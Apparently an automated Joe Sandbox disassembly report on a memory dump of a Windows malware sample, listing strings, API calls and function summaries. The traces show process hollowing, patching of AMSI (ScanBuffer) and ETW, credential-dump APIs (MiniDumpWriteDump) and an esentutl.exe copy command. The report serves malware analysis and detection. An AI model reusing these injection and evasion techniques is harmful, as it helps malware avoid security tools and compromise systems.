WinHttp.WinHttpRequest.5.1, xrefs: 02DB233C
IconIndex=, xrefs: 02DB6DAD
DllGetClassObject, xrefs: 02DAFB03, 02DB003A, 02DBA115, 02DBADE5
BCryptRegisterProvider, xrefs: 02DAFF0F
NtDeviceIoControlFile, xrefs: 02DBA985
FlushInstructionCache, xrefs: 02DBABD8
/o, xrefs: 02DB64C0
DlpGetArchiveFileTraceInfo, xrefs: 02DBA4B3
DlpCheckIsCloudSyncApp, xrefs: 02DBA480
NtMapViewOfSection, xrefs: 02DBAF7D
http, xrefs: 02DB2128
RetailTracerEnable, xrefs: 02DBA0AF
CreateProcessAsUserW, xrefs: 02DBAA2A, 02DBAA48
GZmMS1j, xrefs: 02DAF80F
DlpGetWebSiteAccess, xrefs: 02DBA4E6
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02DB098A
endpointdlp, xrefs: 02DBA464, 02DBA497, 02DBA4CA, 02DBA4FD
sppwmi, xrefs: 02DBADFC
C:\\Users\\Public\\Libraries\\, xrefs: 02DB616F
DllRegisterServer, xrefs: 02DAFB54, 02DB00A0
LdrLoadDll, xrefs: 02DBB049
RtlQueryProcessDebugInformation, xrefs: 02DBA9A3
NtQueryDirectoryFile, xrefs: 02DBA994
NtReadVirtualMemory, xrefs: 02DBAFB0
psapi, xrefs: 02DBA15F
CreateProcessW, xrefs: 02DBAA0C
MiniDumpWriteDump, xrefs: 02DB924E
EnumServicesStatusExA, xrefs: 02DBA9D0
OpenSession, xrefs: 02DAF89A, 02DAFA2A, 02DB0312, 02DB0433, 02DB0540, 02DB0658, 02DB0A2C, 02DB0BCA, 02DB0D70, 02DB0E90, 02DB1025, 02DB111D, 02DB130A, 02DB14B0, 02DB17DE, 02DB1A0C, 02DB1B80, 02DB1CA3, 02DB1E21, 02DB21C7, 02DB224A, 02DB2362, 02DB247A, 02DB2586, 02DB27A4, 02DB28C1, 02DB2B60, 02DB2BDC, 02DB2DF1, 02DB2F91, 02DB32D3, 02DB3461, 02DB367B, 02DB3795, 02DB3B36, 02DB5634, 02DB57CE, 02DB596E, 02DB5B13, 02DB5C87, 02DB5ED7, 02DB5F8B, 02DB6248, 02DB6340, 02DB67EF, 02DB6AC9, 02DB6C3D, 02DB6DD3, 02DB6F83, 02DB766C, 02DB7871, 02DB7A8A, 02DB7B2D, 02DB7CC0, 02DB8088, 02DB8324, 02DB8621, 02DB877A, 02DB8920, 02DB8AAD, 02DB8C41, 02DB8DC0, 02DB8EC3, 02DB9037, 02DB92B5, 02DB94A5, 02DB9796, 02DB991C, 02DB9B77, 02DB9D7D, 02DB9F41, 02DBA230, 02DBA2DF, 02DBA51F, 02DBA716, 02DBA80E, 02DBACC0, 02DBB288
BCryptVerifySignature, xrefs: 02DAFEA9, 02DBA2A6
/d , xrefs: 02DB64B5
Advapi, xrefs: 02DBA9B7, 02DBA9C6, 02DBA9D5, 02DBA9E4, 02DBAA20, 02DBAA2F, 02DBAA3E
EnumProcessModules, xrefs: 02DBA9EE
GET, xrefs: 02DB2455
mssip32, xrefs: 02DAFDAB, 02DAFDDE, 02DAFE11, 02DBA192
CryptSIPGetInfo, xrefs: 02DAFD94
NtQueryVirtualMemory, xrefs: 02DBAEB1
DllGetActivationFactory, xrefs: 02DB006D
NtAccessCheck, xrefs: 02DBB016
VirtualAllocEx, xrefs: 02DBAB0C
sppc, xrefs: 02DB9E86, 02DB9EB9, 02DB9EEC, 02DB9F1F, 02DBAE2F, 02DBAE62
CreateProcessA, xrefs: 02DBA9FD
GetProxyDllInfo, xrefs: 02DAFB2A
WriteVirtualMemory, xrefs: 02DBABA5
smartscreenps, xrefs: 02DB0051, 02DB0084, 02DB00B7
UacUninitialize, xrefs: 02DB3844, 02DB3BB2
dbgcore, xrefs: 02DB9253, 02DB9267
NtSetSecurityObject, xrefs: 02DB9276
VirtualProtect, xrefs: 02DBAB3F
BCryptQueryProviderRegistration, xrefs: 02DAFEDC
SLLoadApplicationPolicies, xrefs: 02DB9F08
NtAlertResumeThread, xrefs: 02DBA611
EnumServicesStatusA, xrefs: 02DBA9B2
NtQuerySystemInformation, xrefs: 02DBA976
ntdll, xrefs: 02DB922B, 02DB927B, 02DB928F, 02DBA628, 02DBA65B, 02DBA68E, 02DBA6C1, 02DBA6F4, 02DBAE95, 02DBAEC8, 02DBAEFB, 02DBAF2E, 02DBAF61, 02DBAF94, 02DBAFC7, 02DBAFFA, 02DBB02D, 02DBB060, 02DBB093, 02DBB0C6, 02DBB0F9, 02DBB12C, 02DBB15F
OpenProcess, xrefs: 02DBAB72
SLGatherMigrationBlob, xrefs: 02DBAE18
EtwEventWrite, xrefs: 02DBB148
TrustOpenStores, xrefs: 02DAFC03
NtOpenFile, xrefs: 02DBB0E2
advapi32, xrefs: 02DB923F
C:\Windows\System32\, xrefs: 02DB040A, 02DB796B, 02DB86B3
acS, xrefs: 02DB3D02
bcrypt, xrefs: 02DAFEC0, 02DAFEF3, 02DAFF26, 02DBA2BD
ScanString, xrefs: 02DAF962, 02DAFB8D, 02DAFCA2, 02DAFE33, 02DAFFC4, 02DB024D, 02DB038E, 02DB0914, 02DB152C, 02DB16C8, 02DB1B04, 02DB1D1F, 02DB1D9B, 02DB20B8, 02DB23DE, 02DB26A7, 02DB2AE4, 02DB2F15, 02DB3125, 02DB31DB, 02DB34DD, 02DB35FF, 02DB38C0, 02DB55B8, 02DB5752, 02DB5A97, 02DB5E5B, 02DB64F2, 02DB6CD8, 02DB6E4F, 02DB6F07, 02DB7574, 02DB7A0E, 02DB7E75, 02DB8498, 02DB8F3F, 02DB9331, 02DB971A, 02DB9AFB, 02DB9DF9, 02DBA1B4, 02DBA59B, 02DBA792, 02DBAD3C
Kernel32, xrefs: 02DBAA02, 02DBAA11, 02DBAA4D
wintrust, xrefs: 02DAFC1A, 02DAFC4D, 02DAFC80
ieproxy, xrefs: 02DAFB14, 02DAFB3B, 02DAFB6B
GetProcessMemoryInfo, xrefs: 02DBA148
NtQuerySecurityObject, xrefs: 02DBAFE3
ScanBuffer, xrefs: 02DAF9C6, 02DAFD1E, 02DAFF48, 02DB04AF, 02DB05BC, 02DB06D4, 02DB0AA8, 02DB0C46, 02DB0DEC, 02DB0F0C, 02DB10A1, 02DB1199, 02DB1402, 02DB15A8, 02DB1744, 02DB185A, 02DB18E8, 02DB1BFC, 02DB1E9D, 02DB1FAE, 02DB214B, 02DB24F6, 02DB2602, 02DB2820, 02DB293D, 02DB2C58, 02DB2CF9, 02DB2E6D, 02DB302D, 02DB334F, 02DB3719, 02DB39B8, 02DB3ABA, 02DB56B0, 02DB59EA, 02DB5D03, 02DB6083, 02DB63BC, 02DB6666, 02DB686B, 02DB69D1, 02DB6B45, 02DB6BC1, 02DB7764, 02DB77F5, 02DB7C25, 02DB7DB8, 02DB7F14, 02DB800C, 02DB8529, 02DB87F6, 02DB899C, 02DB8B29, 02DB8CBD, 02DB8E3C, 02DB90B3, 02DB91AB, 02DB95C7, 02DB98A0, 02DB9A39, 02DB9C6F, 02DB9D01, 02DBA039, 02DBA3D7, 02DBA906, 02DBB20C
I_QueryTagInformation, xrefs: 02DB923A
spp, xrefs: 02DBA0F9, 02DBA12C, 02DBADC9
[InternetShortcut], xrefs: 02DB6D48
SLGetEncryptedPIDEx, xrefs: 02DBAE4B
SLIsGenuineLocalEx, xrefs: 02DB9ED5
URL=file:", xrefs: 02DB6D57
.url, xrefs: 02DB5D93
NtWriteVirtualMemory, xrefs: 02DBB0AF
NtGetWriteWatch, xrefs: 02DBAE7E
NtQueryInformationThread, xrefs: 02DBAEE4
HotKey=, xrefs: 02DB6EE1
NtOpenSection, xrefs: 02DBAF17
Initialize, xrefs: 02DAF8FE, 02DB081C, 02DB09B0, 02DB0B4E, 02DB0CF4, 02DB0FA9, 02DB164C, 02DB1A88, 02DB1F32, 02DB203C, 02DB2723, 02DB2A55, 02DB2D75, 02DB30A9, 02DB3257, 02DB3583, 02DB393C, 02DB5876, 02DB5C0B, 02DB6007, 02DB61CC, 02DB6438, 02DB656E, 02DB6773, 02DB76E8, 02DB83A0, 02DB93AD, 02DB9FBD, 02DBA35B, 02DBA88A, 02DBAC44, 02DBB190
NtOpenProcess, xrefs: 02DB928A
VirtualAlloc, xrefs: 02DBAAD9
SLGetSLIDList, xrefs: 02DB9EA2
tquery, xrefs: 02DBA0C6
NtWaitForSingleObject, xrefs: 02DBA677
EtwEventWriteEx, xrefs: 02DBB115
NtOpenObjectAuditAlarm, xrefs: 02DB9226
WintrustAddActionID, xrefs: 02DAFC36
MZP, xrefs: 02DB9992
CreateProcessAsUserA, xrefs: 02DBAA1B
RtlAllocateHeap, xrefs: 02DBA644, 02DBA6AA
FindCertsByIssuer, xrefs: 02DAFC69
SetUnhandledExceptionFilter, xrefs: 02DBAC0B
CreateProcessWithLogonW, xrefs: 02DBAA39
CryptSIPGetSignedDataMsg, xrefs: 02DAFDFA
C:\Users\Public\, xrefs: 02DB5D88, 02DB6FF3
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02DB64AA
SxTracerGetThreadContextDebug, xrefs: 02DBA0E2, 02DBADB2
SLGetGenuineInformation, xrefs: 02DB9E6F
kernel32, xrefs: 02DBAAF0, 02DBAB23, 02DBAB56, 02DBAB89, 02DBABBC, 02DBABEF, 02DBAC22
Ntdll, xrefs: 02DBA97B, 02DBA98A, 02DBA999, 02DBA9A8

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryFreeInetInformationLibraryName_OfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 297057983-2644593349
Opcode ID: c12f30f7a05a0dab58843bb28ea6c068340edd7136bc0f307fae60a0b677129c
Instruction ID: 46ebcfb3cb78d577dc9a454c733002b8161ba46feaf0232e34f881b60161f506
Opcode Fuzzy Hash: c12f30f7a05a0dab58843bb28ea6c068340edd7136bc0f307fae60a0b677129c
Instruction Fuzzy Hash: 03141C75A4015CDFDF21EB64DC90ACE73BAFF89304F5041E6A409AB715DA30AE868F61

Function 02DA8D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654
threadnativeinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA

Part of subcall function 02DA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814

GetThreadContext.KERNEL32(000008A0,02E17424,ScanString,02E173A8,02DAA93C,UacInitialize,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,UacInitialize,02E173A8), ref: 02DA9602

Part of subcall function 02DA8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA8471

Part of subcall function 02DA8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DA86D5

Part of subcall function 02DA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F

Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC

SetThreadContext.KERNEL32(000008A0,02E17424,ScanBuffer,02E173A8,02DAA93C,ScanString,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,0000089C,002F8FF8,02E174FC,00000004,02E17500), ref: 02DAA317
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000008A0,00000000,000008A0,02E17424,ScanBuffer,02E173A8,02DAA93C,ScanString,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,0000089C,002F8FF8,02E174FC), ref: 02DAA324

Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6

Strings

ntdll, xrefs: 02DAA625, 02DAA639, 02DAA6F1, 02DAA894, 02DAA8A8
MiniDumpWriteDump, xrefs: 02DAA714
NtReadVirtualMemory, xrefs: 02DAA620
bcrypt, xrefs: 02DAA578, 02DAA58C, 02DAA5A0
dbgcore, xrefs: 02DAA719, 02DAA72D
OpenSession, xrefs: 02DA8DA9, 02DA91CC, 02DA927E, 02DAA64F, 02DAA795
NtOpenProcess, xrefs: 02DAA8A3
ScanString, xrefs: 02DA8E02, 02DA8FAD, 02DA915B, 02DA9583, 02DA9769, 02DA98F0, 02DA9D7D, 02DA9F3B, 02DAA0AB, 02DAA21E, 02DAA509, 02DAA5B6
BCryptRegisterProvider, xrefs: 02DAA59B
MiniDumpReadDumpStream, xrefs: 02DAA728
I_QueryTagInformation, xrefs: 02DAA700
BCryptVerifySignature, xrefs: 02DAA573
advapi32, xrefs: 02DAA705
SLGetLicenseInformation, xrefs: 02DA935F
NtSetSecurityObject, xrefs: 02DAA88F
BCryptQueryProviderRegistration, xrefs: 02DAA587
UacInitialize, xrefs: 02DA9032, 02DA9393, 02DA9512, 02DA9616, 02DA9A12, 02DA9B86, 02DAA330
UacScan, xrefs: 02DA8E73, 02DA908B, 02DA9687, 02DA9A83, 02DA9BF7, 02DAA3A1, 02DAA839
sppc, xrefs: 02DA9376
Initialize, xrefs: 02DA90EA, 02DA96F8, 02DA987F, 02DA9C68, 02DA9ECA, 02DAA03A, 02DAA1AD, 02DAA412, 02DAA743
NtOpenObjectAuditAlarm, xrefs: 02DAA634, 02DAA6EC
ScanBuffer, xrefs: 02DA8ECC, 02DA8F54, 02DA92EF, 02DA9404, 02DA94A1, 02DA97DA, 02DA9961, 02DA9AF4, 02DA9CD9, 02DA9DEE, 02DA9FAC, 02DAA11C, 02DAA28F, 02DAA483, 02DAA6A1, 02DAA7E7

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 2388221946-51457883
Opcode ID: b772b31b8b199b9ee2eb7915f135e65565940b8e6a5a7e849dd0432a05769286
Instruction ID: af2826df9fa8a8d7c1ea817e88f096ee8f6419e68469a01a32018335627c91fb
Opcode Fuzzy Hash: b772b31b8b199b9ee2eb7915f135e65565940b8e6a5a7e849dd0432a05769286
Instruction Fuzzy Hash: 67E2EA75A401589FDF11EB64DC90ECFB3BAFF85700F9042A5A409AB315DA30AE86DF61

Function 02DA8D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA

Part of subcall function 02DA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814

GetThreadContext.KERNEL32(000008A0,02E17424,ScanString,02E173A8,02DAA93C,UacInitialize,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,UacInitialize,02E173A8), ref: 02DA9602

Part of subcall function 02DA8400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA8471

Part of subcall function 02DA8670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02DA86D5

Part of subcall function 02DA7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02DA7A9F

Strings

ntdll, xrefs: 02DAA625, 02DAA639, 02DAA6F1, 02DAA894, 02DAA8A8
MiniDumpWriteDump, xrefs: 02DAA714
NtReadVirtualMemory, xrefs: 02DAA620
bcrypt, xrefs: 02DAA578, 02DAA58C, 02DAA5A0
dbgcore, xrefs: 02DAA719, 02DAA72D
OpenSession, xrefs: 02DA8DA9, 02DA91CC, 02DA927E, 02DAA64F, 02DAA795
NtOpenProcess, xrefs: 02DAA8A3
ScanString, xrefs: 02DA8E02, 02DA8FAD, 02DA915B, 02DA9583, 02DA9769, 02DA98F0, 02DA9D7D, 02DA9F3B, 02DAA0AB, 02DAA21E, 02DAA509, 02DAA5B6
BCryptRegisterProvider, xrefs: 02DAA59B
MiniDumpReadDumpStream, xrefs: 02DAA728
I_QueryTagInformation, xrefs: 02DAA700
BCryptVerifySignature, xrefs: 02DAA573
advapi32, xrefs: 02DAA705
SLGetLicenseInformation, xrefs: 02DA935F
NtSetSecurityObject, xrefs: 02DAA88F
BCryptQueryProviderRegistration, xrefs: 02DAA587
UacInitialize, xrefs: 02DA9032, 02DA9393, 02DA9512, 02DA9616, 02DAA330
UacScan, xrefs: 02DA8E73, 02DA908B, 02DA9687, 02DA9A83, 02DA9BF7, 02DAA3A1, 02DAA839
sppc, xrefs: 02DA9376
Initialize, xrefs: 02DA90EA, 02DA96F8, 02DA987F, 02DA9C68, 02DA9ECA, 02DAA03A, 02DAA1AD, 02DAA412, 02DAA743
NtOpenObjectAuditAlarm, xrefs: 02DAA634, 02DAA6EC
ScanBuffer, xrefs: 02DA8ECC, 02DA8F54, 02DA92EF, 02DA9404, 02DA94A1, 02DA97DA, 02DA9961, 02DA9AF4, 02DA9CD9, 02DA9DEE, 02DA9FAC, 02DAA11C, 02DAA28F, 02DAA483, 02DAA6A1, 02DAA7E7

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
API String ID: 3386062106-51457883
Opcode ID: 4b860c16887d17da15e5c9e5069f58c516d43f1208819d1adee6486780860a9a
Instruction ID: 8883cd0da0990b1b3099f0673774638ff9c4b19126ead4baafafa03f7370b2d0
Opcode Fuzzy Hash: 4b860c16887d17da15e5c9e5069f58c516d43f1208819d1adee6486780860a9a
Instruction Fuzzy Hash: F3E2E975A401589FDF11EB64DC90ECFB3BAFF85700F9042A5A409AB315DA30AE86DF61

Function 02D95ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D90000,02DBE790), ref: 02D95AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D90000,02DBE790), ref: 02D95B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D95B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D95B8B
RegQueryValueExA.ADVAPI32(?,02D95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D95BD1,?,80000001), ref: 02D95BA9
RegCloseKey.ADVAPI32(?,02D95BD8,00000000,?,?,00000000,02D95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D95BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D95BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D95BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D95BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D95C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D95CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D95CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D95CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D95CEB

Strings

Software\Borland\Delphi\Locales, xrefs: 02D95B38
Software\Borland\Locales, xrefs: 02D95AFC, 02D95B1A

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2d90000_x.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 192f5616dc0f1ae3a86b6f9ec3a2a24bf570381eb8c9aaa903b604d4b51fe63c
Instruction ID: 098bae84c14ea56c3702812831771906d6a5336ac201a566b0198cba887f158a
Opcode Fuzzy Hash: 192f5616dc0f1ae3a86b6f9ec3a2a24bf570381eb8c9aaa903b604d4b51fe63c
Instruction Fuzzy Hash: B8516F71A4025D7AFF26D6A4AC46FEF77ADDB04744F8041B1BA04E6281EA74DE44CFA0

Function 02DA894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6

Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC

Strings

bcrypt, xrefs: 02DA895F
BCryptVerifySignature, xrefs: 02DA8973

Memory Dump Source

Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true

Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
